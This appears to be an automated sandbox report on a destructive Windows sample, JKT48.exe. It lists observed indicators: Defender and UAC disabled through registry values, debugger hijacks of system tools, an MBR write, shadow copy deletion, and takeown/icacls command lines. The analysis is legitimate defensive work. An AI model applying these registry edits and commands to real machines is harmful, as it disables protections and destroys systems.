9b495506295d895825ddf2a45c28f704debc31f28c4943b1a78b75c898a4375d

Analysis

max time kernel
118s
max time network
122s
platform
windows7_x64
resource
win7-20241023-en
resource tags

arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
submitted
27/03/2025, 13:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JKT48.exe
Size

8.0MB
MD5

41f5bac802f5e79dc2ca7a3db25d0001
SHA1

ce56c42cadd2db13edf03c15ce3b11c2cfa00f9e
SHA256

9b495506295d895825ddf2a45c28f704debc31f28c4943b1a78b75c898a4375d
SHA512

94705e83ce1b104954be07210ea3648c7403a6dd86ebaf6e884ced1552636b6a05a3b2926415d6c49ff251a675815435e4b2a3c8f816bbbf68c08c3299db99ab
SSDEEP

196608:PF35AX/ip4e/aS3e+gr80KILDjhoOX9oeqZ8r8swzH0e:d3KX/o4eSTr80xHhJ8s63

Score

10^/10

bootkit defense_evasion discovery evasion execution exploit impact persistence ransomware trojan

Malware Config

Signatures

Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	JKT48.exe

UAC bypass 3 TTPs 1 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	JKT48.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Disables RegEdit via registry modification 1 IoCs

defense_evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	JKT48.exe

Disables Task Manager via registry modification
defense_evasion
Disables use of System Restore points 1 TTPs
defense_evasion

Inhibit System Recovery
T1490

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 32 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\resmon.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\trustedinstaller.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sfc.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sfc.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LogonUI.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LogonUI.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ipconfig.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\resmon.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ipconfig.exe	JKT48.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\trustedinstaller.exe\Debugger = "*/"	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe	JKT48.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe	JKT48.exe

Possible privilege escalation attempt 64 IoCs

exploit

pid	Process
2044	icacls.exe
1936	icacls.exe
536	takeown.exe
1084	icacls.exe
856	takeown.exe
2820	icacls.exe
1520	icacls.exe
2768	icacls.exe
3000	icacls.exe
2324	icacls.exe
1644	icacls.exe
1016	takeown.exe
2856	icacls.exe
2872	icacls.exe
2068	takeown.exe
640	icacls.exe
2056	icacls.exe
1552	takeown.exe
1736	takeown.exe
2516	icacls.exe
620	icacls.exe
868	takeown.exe
1052	takeown.exe
984	icacls.exe
2756	icacls.exe
1956	icacls.exe
1432	icacls.exe
1308	icacls.exe
1376	takeown.exe
1040	icacls.exe
2860	takeown.exe
1772	takeown.exe
2640	takeown.exe
1052	takeown.exe
224	icacls.exe
2284	takeown.exe
1256	icacls.exe
200	icacls.exe
2308	icacls.exe
2668	takeown.exe
1440	takeown.exe
1536	takeown.exe
1644	takeown.exe
1736	icacls.exe
1856	takeown.exe
1840	takeown.exe
1452	icacls.exe
204	icacls.exe
2252	takeown.exe
2640	takeown.exe
1704	icacls.exe
1392	takeown.exe
3020	takeown.exe
1788	icacls.exe
1064	takeown.exe
2748	takeown.exe
3040	takeown.exe
220	takeown.exe
856	takeown.exe
2780	takeown.exe
2380	icacls.exe
2052	takeown.exe
2444	takeown.exe
2756	icacls.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
900	takeown.exe
1536	takeown.exe
1992	takeown.exe
1828	takeown.exe
2428	icacls.exe
2068	icacls.exe
1168	icacls.exe
2756	takeown.exe
1040	icacls.exe
1384	takeown.exe
1880	icacls.exe
2924	icacls.exe
2392	icacls.exe
1792	takeown.exe
1116	takeown.exe
2284	icacls.exe
808	takeown.exe
2700	takeown.exe
2624	takeown.exe
2748	takeown.exe
1976	takeown.exe
1736	takeown.exe
2552	takeown.exe
200	takeown.exe
1336	takeown.exe
1660	takeown.exe
1748	takeown.exe
1348	takeown.exe
1516	takeown.exe
2236	takeown.exe
1452	icacls.exe
2836	takeown.exe
2812	icacls.exe
1664	takeown.exe
2820	icacls.exe
1520	takeown.exe
1012	takeown.exe
1660	icacls.exe
1960	icacls.exe
1332	icacls.exe
1772	takeown.exe
2556	takeown.exe
924	takeown.exe
2876	takeown.exe
2760	takeown.exe
2700	icacls.exe
1592	takeown.exe
2820	takeown.exe
1824	icacls.exe
2660	icacls.exe
2804	icacls.exe
1880	icacls.exe
1204	takeown.exe
1576	icacls.exe
3020	icacls.exe
2392	icacls.exe
1284	icacls.exe
2348	takeown.exe
2644	icacls.exe
1792	icacls.exe
2704	icacls.exe
2244	icacls.exe
1204	takeown.exe
2888	takeown.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	JKT48.exe

Drops file in System32 directory 29 IoCs

description	ioc	Process
File created	C:\windows\system32\perfmon.exe	JKT48.exe
File created	C:\windows\system32\rundll32.exe	JKT48.exe
File created	C:\windows\system32\hal.dll	JKT48.exe
File created	C:\windows\system32\ntoskrnl.exe	JKT48.exe
File created	C:\windows\syswow64\sfc.exe	JKT48.exe
File created	C:\windows\system32\msconfig.exe	JKT48.exe
File created	C:\windows\system32\utilman.exe	JKT48.exe
File created	C:\windows\syswow64\perfmon.msc	JKT48.exe
File created	C:\windows\syswow64\rundll32.exe	JKT48.exe
File created	C:\windows\system32\rstrui.exe	JKT48.exe
File created	C:\windows\system32\sfc.exe	JKT48.exe
File created	C:\windows\syswow64\cmd.exe	JKT48.exe
File created	C:\windows\syswow64\utilman.exe	JKT48.exe
File created	C:\windows\system32\reg.exe	JKT48.exe
File created	C:\windows\system32\resmon.exe	JKT48.exe
File created	C:\windows\system32\winload.exe	JKT48.exe
File created	C:\windows\syswow64\regedit.exe	JKT48.exe
File created	C:\windows\syswow64\reg.exe	JKT48.exe
File created	C:\windows\syswow64\perfmon.exe	JKT48.exe
File created	C:\windows\syswow64\resmon.exe	JKT48.exe
File created	C:\windows\system32\perfmon.msc	JKT48.exe
File created	C:\windows\syswow64\taskmgr.exe	JKT48.exe
File created	C:\windows\system32\logonui.exe	JKT48.exe
File created	C:\windows\syswow64\sethc.exe	JKT48.exe
File created	C:\windows\syswow64\taskkill.exe	JKT48.exe
File created	C:\windows\system32\cmd.exe	JKT48.exe
File created	C:\windows\system32\taskmgr.exe	JKT48.exe
File created	C:\windows\system32\sethc.exe	JKT48.exe
File created	C:\windows\system32\taskkill.exe	JKT48.exe

Drops file in Program Files directory 56 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\7-Zip\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\MSInfo\574680173	JKT48.exe
File created	C:\Program Files\Common Files\Microsoft Shared\OFFICE14\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\OFFICE14\RCX1318.tmp	JKT48.exe
File created	C:\Program Files\DVD Maker\925839608	JKT48.exe
File opened for modification	C:\Program Files\DVD Maker\RCX1D48.tmp	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\RCX2597.tmp	JKT48.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Google\Chrome\Application\677338313	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\RCX2305.tmp	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\677338313	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\411413135	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\971963290	JKT48.exe
File opened for modification	C:\Program Files\Internet Explorer\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Google\Chrome\Application\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\RCX241F.tmp	JKT48.exe
File created	C:\Program Files\Internet Explorer\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\MSInfo\RCX1104.tmp	JKT48.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\OFFICE14\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\OFFICE14\RCX1319.tmp	JKT48.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\RCX2598.tmp	JKT48.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\OFFICE14\522081887	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\RCX22F4.tmp	JKT48.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\411413135	JKT48.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\7-Zip\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Common Files\Microsoft Shared\MSInfo\msvcp120ex.dll	JKT48.exe
File created	C:\Program Files\Common Files\Microsoft Shared\MSInfo\574680173	JKT48.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\RCX241E.tmp	JKT48.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\971963290	JKT48.exe
File created	C:\Program Files\Internet Explorer\921624652	JKT48.exe
File opened for modification	C:\Program Files\Internet Explorer\RCX2886.tmp	JKT48.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\DVD Maker\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\DVD Maker\925839608	JKT48.exe
File opened for modification	C:\Program Files\Internet Explorer\RCX2887.tmp	JKT48.exe
File opened for modification	C:\Program Files\Internet Explorer\921624652	JKT48.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\MSInfo\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\MSInfo\RCX1105.tmp	JKT48.exe
File created	C:\Program Files\Common Files\Microsoft Shared\OFFICE14\522081887	JKT48.exe
File created	C:\Program Files\DVD Maker\msvcp120ex.dll	JKT48.exe
File opened for modification	C:\Program Files\DVD Maker\RCX1D38.tmp	JKT48.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\msvcp120ex.dll	JKT48.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\windows\regedit.exe	JKT48.exe
File created	C:\windows\servicing\trustedinstaller.exe	JKT48.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
1676	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 51 IoCs

pid	Process
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1804	JKT48.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1804	JKT48.exe
Token: SeDebugPrivilege	1804	JKT48.exe
Token: SeIncBasePriorityPrivilege	1804	JKT48.exe
Token: SeTakeOwnershipPrivilege	2872	takeown.exe
Token: SeTakeOwnershipPrivilege	1748	takeown.exe
Token: SeTakeOwnershipPrivilege	1644	takeown.exe
Token: SeTakeOwnershipPrivilege	1676	takeown.exe
Token: SeTakeOwnershipPrivilege	900	takeown.exe
Token: SeTakeOwnershipPrivilege	2076	takeown.exe
Token: SeTakeOwnershipPrivilege	2700	takeown.exe
Token: SeTakeOwnershipPrivilege	1928	takeown.exe
Token: SeTakeOwnershipPrivilege	2036	takeown.exe
Token: SeTakeOwnershipPrivilege	2504	takeown.exe
Token: SeTakeOwnershipPrivilege	2564	takeown.exe
Token: SeTakeOwnershipPrivilege	2396	takeown.exe
Token: SeTakeOwnershipPrivilege	2672	takeown.exe
Token: SeTakeOwnershipPrivilege	448	takeown.exe
Token: SeTakeOwnershipPrivilege	3040	takeown.exe
Token: SeTakeOwnershipPrivilege	2344	takeown.exe
Token: SeTakeOwnershipPrivilege	2860	takeown.exe
Token: SeTakeOwnershipPrivilege	868	takeown.exe
Token: SeTakeOwnershipPrivilege	1536	takeown.exe
Token: SeTakeOwnershipPrivilege	1084	takeown.exe
Token: SeTakeOwnershipPrivilege	1964	takeown.exe
Token: SeTakeOwnershipPrivilege	976	takeown.exe
Token: SeTakeOwnershipPrivilege	2784	takeown.exe
Token: SeTakeOwnershipPrivilege	2940	takeown.exe
Token: SeTakeOwnershipPrivilege	2860	takeown.exe
Token: SeTakeOwnershipPrivilege	2820	takeown.exe
Token: SeTakeOwnershipPrivilege	2864	takeown.exe
Token: SeTakeOwnershipPrivilege	2752	takeown.exe
Token: SeTakeOwnershipPrivilege	1256	takeown.exe
Token: SeTakeOwnershipPrivilege	1936	takeown.exe
Token: SeTakeOwnershipPrivilege	1792	takeown.exe
Token: SeTakeOwnershipPrivilege	2020	takeown.exe
Token: SeTakeOwnershipPrivilege	1748	takeown.exe
Token: SeTakeOwnershipPrivilege	772	takeown.exe
Token: SeTakeOwnershipPrivilege	1832	takeown.exe
Token: SeTakeOwnershipPrivilege	2688	takeown.exe
Token: SeTakeOwnershipPrivilege	552	takeown.exe
Token: SeTakeOwnershipPrivilege	1516	takeown.exe
Token: SeTakeOwnershipPrivilege	1588	takeown.exe
Token: SeTakeOwnershipPrivilege	1044	takeown.exe
Token: SeTakeOwnershipPrivilege	2652	takeown.exe
Token: SeTakeOwnershipPrivilege	2660	takeown.exe
Token: SeTakeOwnershipPrivilege	2932	takeown.exe
Token: SeTakeOwnershipPrivilege	2860	takeown.exe
Token: SeTakeOwnershipPrivilege	2876	takeown.exe
Token: SeTakeOwnershipPrivilege	2364	takeown.exe
Token: SeTakeOwnershipPrivilege	2756	takeown.exe
Token: SeTakeOwnershipPrivilege	1764	takeown.exe
Token: SeTakeOwnershipPrivilege	1204	takeown.exe
Token: SeTakeOwnershipPrivilege	1664	takeown.exe
Token: SeTakeOwnershipPrivilege	2516	takeown.exe
Token: SeTakeOwnershipPrivilege	1640	takeown.exe
Token: SeTakeOwnershipPrivilege	2424	takeown.exe
Token: SeTakeOwnershipPrivilege	1792	takeown.exe
Token: SeTakeOwnershipPrivilege	1568	takeown.exe
Token: SeTakeOwnershipPrivilege	716	takeown.exe
Token: SeTakeOwnershipPrivilege	2772	takeown.exe
Token: SeTakeOwnershipPrivilege	2148	takeown.exe
Token: SeTakeOwnershipPrivilege	2004	takeown.exe
Token: SeTakeOwnershipPrivilege	2284	takeown.exe
Token: SeBackupPrivilege	1512	vssvc.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1804	JKT48.exe
1804	JKT48.exe
1804	JKT48.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1804 wrote to memory of 2324	1804	JKT48.exe	30
PID 1804 wrote to memory of 2324	1804	JKT48.exe	30
PID 1804 wrote to memory of 2324	1804	JKT48.exe	30
PID 1804 wrote to memory of 588	1804	JKT48.exe	32
PID 1804 wrote to memory of 588	1804	JKT48.exe	32
PID 1804 wrote to memory of 588	1804	JKT48.exe	32
PID 1804 wrote to memory of 784	1804	JKT48.exe	34
PID 1804 wrote to memory of 784	1804	JKT48.exe	34
PID 1804 wrote to memory of 784	1804	JKT48.exe	34
PID 1804 wrote to memory of 2812	1804	JKT48.exe	36
PID 1804 wrote to memory of 2812	1804	JKT48.exe	36
PID 1804 wrote to memory of 2812	1804	JKT48.exe	36
PID 1804 wrote to memory of 2948	1804	JKT48.exe	38
PID 1804 wrote to memory of 2948	1804	JKT48.exe	38
PID 1804 wrote to memory of 2948	1804	JKT48.exe	38
PID 1804 wrote to memory of 2968	1804	JKT48.exe	40
PID 1804 wrote to memory of 2968	1804	JKT48.exe	40
PID 1804 wrote to memory of 2968	1804	JKT48.exe	40
PID 1804 wrote to memory of 2508	1804	JKT48.exe	42
PID 1804 wrote to memory of 2508	1804	JKT48.exe	42
PID 1804 wrote to memory of 2508	1804	JKT48.exe	42
PID 1804 wrote to memory of 572	1804	JKT48.exe	44
PID 1804 wrote to memory of 572	1804	JKT48.exe	44
PID 1804 wrote to memory of 572	1804	JKT48.exe	44
PID 1804 wrote to memory of 2748	1804	JKT48.exe	47
PID 1804 wrote to memory of 2748	1804	JKT48.exe	47
PID 1804 wrote to memory of 2748	1804	JKT48.exe	47
PID 1804 wrote to memory of 2704	1804	JKT48.exe	49
PID 1804 wrote to memory of 2704	1804	JKT48.exe	49
PID 1804 wrote to memory of 2704	1804	JKT48.exe	49
PID 1804 wrote to memory of 2780	1804	JKT48.exe	51
PID 1804 wrote to memory of 2780	1804	JKT48.exe	51
PID 1804 wrote to memory of 2780	1804	JKT48.exe	51
PID 1804 wrote to memory of 2872	1804	JKT48.exe	52
PID 1804 wrote to memory of 2872	1804	JKT48.exe	52
PID 1804 wrote to memory of 2872	1804	JKT48.exe	52
PID 1804 wrote to memory of 2672	1804	JKT48.exe	55
PID 1804 wrote to memory of 2672	1804	JKT48.exe	55
PID 1804 wrote to memory of 2672	1804	JKT48.exe	55
PID 1804 wrote to memory of 1068	1804	JKT48.exe	57
PID 1804 wrote to memory of 1068	1804	JKT48.exe	57
PID 1804 wrote to memory of 1068	1804	JKT48.exe	57
PID 1804 wrote to memory of 2428	1804	JKT48.exe	59
PID 1804 wrote to memory of 2428	1804	JKT48.exe	59
PID 1804 wrote to memory of 2428	1804	JKT48.exe	59
PID 1804 wrote to memory of 1724	1804	JKT48.exe	61
PID 1804 wrote to memory of 1724	1804	JKT48.exe	61
PID 1804 wrote to memory of 1724	1804	JKT48.exe	61
PID 1804 wrote to memory of 1748	1804	JKT48.exe	63
PID 1804 wrote to memory of 1748	1804	JKT48.exe	63
PID 1804 wrote to memory of 1748	1804	JKT48.exe	63
PID 1804 wrote to memory of 1340	1804	JKT48.exe	65
PID 1804 wrote to memory of 1340	1804	JKT48.exe	65
PID 1804 wrote to memory of 1340	1804	JKT48.exe	65
PID 1804 wrote to memory of 2064	1804	JKT48.exe	67
PID 1804 wrote to memory of 2064	1804	JKT48.exe	67
PID 1804 wrote to memory of 2064	1804	JKT48.exe	67
PID 1804 wrote to memory of 2416	1804	JKT48.exe	69
PID 1804 wrote to memory of 2416	1804	JKT48.exe	69
PID 1804 wrote to memory of 2416	1804	JKT48.exe	69
PID 1804 wrote to memory of 1644	1804	JKT48.exe	71
PID 1804 wrote to memory of 1644	1804	JKT48.exe	71
PID 1804 wrote to memory of 1644	1804	JKT48.exe	71
PID 1804 wrote to memory of 2252	1804	JKT48.exe	73

System policy modification 1 TTPs 1 IoCs

defense_evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	JKT48.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\JKT48.exe
"C:\Users\Admin\AppData\Local\Temp\JKT48.exe"
1⤵
- Modifies Windows Defender DisableAntiSpyware settings
- UAC bypass
- Disables RegEdit via registry modification
- Event Triggered Execution: Image File Execution Options Injection
- Writes to the Master Boot Record (MBR)
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1804
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\$Recycle.Bin" /a
  2⤵
  PID:2324
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\$Recycle.Bin" /grant Administrators:F
  2⤵
  PID:588
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\$Recycle.Bin\S-1-5-21-1163522206-1469769407-485553996-1000" /a
  2⤵
  PID:784
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\$Recycle.Bin\S-1-5-21-1163522206-1469769407-485553996-1000" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:2812
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Documents and Settings" /a
  2⤵
  PID:2948
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Documents and Settings" /grant Administrators:F
  2⤵
  PID:2968
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\MSOCache" /a
  2⤵
  PID:2508
- C:\windows\system32\icacls.exe
